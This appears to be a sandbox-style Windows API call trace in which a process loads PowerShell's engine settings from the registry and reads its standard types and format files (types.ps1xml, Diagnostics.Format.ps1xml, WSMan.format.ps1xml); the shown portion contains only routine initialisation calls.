	[0533.548] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d2fc, lpData=0x1b95b1b0, lpcbData=0x24d2f8*=0x56 | out: lpType=0x24d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d2f8*=0x56) returned 0x0
	[0533.549] CoTaskMemFree (pv=0x1b95b1b0) 
	[0533.549] RegCloseKey (hKey=0x320) returned 0x0
	[0533.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0533.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0534.405] VirtualQuery (in: lpAddress=0x24c090, lpBuffer=0x24cf50, dwLength=0x30 | out: lpBuffer=0x24cf50*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0535.199] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0535.199] GetFileType (hFile=0x31c) returned 0x1
	[0535.199] SetErrorMode (uMode=0x1) returned 0x1
	[0535.199] GetFileType (hFile=0x31c) returned 0x1
	[0535.199] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.200] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.200] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.200] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.201] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.201] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.201] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.201] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.201] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.202] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.203] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.203] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.203] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.203] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.204] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.204] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.204] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.207] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.207] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.207] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.207] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.208] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.208] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.209] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.209] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.209] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.209] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.210] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.210] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.210] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.210] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.211] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.211] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.215] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.216] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.216] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.216] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.216] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.217] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.217] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.217] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1000, lpOverlapped=0x0) returned 1
	[0535.217] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x1b4, lpOverlapped=0x0) returned 1
	[0535.218] ReadFile (in: hFile=0x31c, lpBuffer=0x2f32118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d348, lpOverlapped=0x0 | out: lpBuffer=0x2f32118*, lpNumberOfBytesRead=0x24d348*=0x0, lpOverlapped=0x0) returned 1
	[0535.218] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d3a8 | out: phkResult=0x24d3a8*=0x31c) returned 0x0
	[0535.218] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d32c, lpData=0x0, lpcbData=0x24d328*=0x0 | out: lpType=0x24d32c*=0x1, lpData=0x0, lpcbData=0x24d328*=0x56) returned 0x0
	[0535.218] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b370
	[0535.218] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d2fc, lpData=0x1b95b370, lpcbData=0x24d2f8*=0x56 | out: lpType=0x24d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d2f8*=0x56) returned 0x0
	[0535.218] CoTaskMemFree (pv=0x1b95b370) 
	[0535.218] RegCloseKey (hKey=0x31c) returned 0x0
	[0535.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0535.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0538.373] VirtualQuery (in: lpAddress=0x24c090, lpBuffer=0x24cf50, dwLength=0x30 | out: lpBuffer=0x24cf50*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0541.465] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0541.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0541.465] CoTaskMemFree (pv=0x19bb70) 
	[0541.487] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d548 | out: phkResult=0x24d548*=0x31c) returned 0x0
	[0541.488] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d55c, lpData=0x0, lpcbData=0x24d558*=0x0 | out: lpType=0x24d55c*=0x1, lpData=0x0, lpcbData=0x24d558*=0x74) returned 0x0
	[0541.488] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d4cc, lpData=0x0, lpcbData=0x24d4c8*=0x0 | out: lpType=0x24d4cc*=0x1, lpData=0x0, lpcbData=0x24d4c8*=0x74) returned 0x0
	[0541.488] CoTaskMemAlloc (cb=0x78) returned 0x134340
	[0541.488] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d49c, lpData=0x134340, lpcbData=0x24d498*=0x74 | out: lpType=0x24d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d498*=0x74) returned 0x0
	[0541.488] CoTaskMemFree (pv=0x134340) 
	[0541.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0541.488] SetErrorMode (uMode=0x1) returned 0x1
	[0541.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d420 | out: lpFileInformation=0x24d420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0541.488] SetErrorMode (uMode=0x1) returned 0x1
	[0541.489] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0541.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0541.490] CoTaskMemFree (pv=0x19bb70) 
	[0541.499] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0541.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0541.499] CoTaskMemFree (pv=0x19bb70) 
	[0541.501] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0541.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0541.501] CoTaskMemFree (pv=0x19bb70) 
	[0541.502] CoTaskMemAlloc (cb=0x104) returned 0x19bb70
	[0541.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bb70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0541.503] CoTaskMemFree (pv=0x19bb70) 
	[0541.503] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0541.503] GetFileType (hFile=0x2ec) returned 0x1
	[0541.503] SetErrorMode (uMode=0x1) returned 0x1
	[0541.503] GetFileType (hFile=0x2ec) returned 0x1
	[0541.503] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.505] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.506] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.506] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.506] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.507] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0541.507] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0541.507] ReadFile (in: hFile=0x2ec, lpBuffer=0x35d96ca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35d96ca*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0541.507] ReadFile (in: hFile=0x2ec, lpBuffer=0x35da180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x35da180*, lpNumberOfBytesRead=0x24d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0541.507] CloseHandle (hObject=0x2ec) returned 1
	[0541.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0541.507] SetErrorMode (uMode=0x1) returned 0x1
	[0541.508] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d060 | out: lpFileInformation=0x24d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0541.508] SetErrorMode (uMode=0x1) returned 0x1
	[0541.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0541.508] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d148 | out: phkResult=0x24d148*=0x2ec) returned 0x0
	[0541.508] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d0cc, lpData=0x0, lpcbData=0x24d0c8*=0x0 | out: lpType=0x24d0cc*=0x1, lpData=0x0, lpcbData=0x24d0c8*=0x56) returned 0x0
	[0541.508] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b450
	[0541.508] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d09c, lpData=0x1b95b450, lpcbData=0x24d098*=0x56 | out: lpType=0x24d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d098*=0x56) returned 0x0
	[0541.508] CoTaskMemFree (pv=0x1b95b450) 
	[0541.508] RegCloseKey (hKey=0x2ec) returned 0x0
	[0541.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0541.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0542.325] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0x58fc4372, Data2=0x15c9, Data3=0x4e4d, Data4=([0]=0xb2, [1]=0x93, [2]=0x22, [3]=0xdc, [4]=0xb7, [5]=0x9, [6]=0x1a, [7]=0x5b))) returned 0x0
	[0542.332] CoCreateGuid (in: pguid=0x24d370 | out: pguid=0x24d370*(Data1=0xc8dfbedf, Data2=0x20ce, Data3=0x4b87, Data4=([0]=0xa7, [1]=0x27, [2]=0x6b, [3]=0x8, [4]=0x6, [5]=0xa, [6]=0x88, [7]=0xaf))) returned 0x0
	[0542.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0542.335] SetErrorMode (uMode=0x1) returned 0x1
	[0542.335] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0542.335] GetFileType (hFile=0x2ec) returned 0x1
	[0542.335] SetErrorMode (uMode=0x1) returned 0x1
	[0542.335] GetFileType (hFile=0x2ec) returned 0x1
	[0542.335] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.338] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0542.338] ReadFile (in: hFile=0x2ec, lpBuffer=0x3604ce8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d0b8, lpOverlapped=0x0 | out: lpBuffer=0x3604ce8*, lpNumberOfBytesRead=0x24d0b8*=0x1000, lpOverlapped=0x0) returned 1
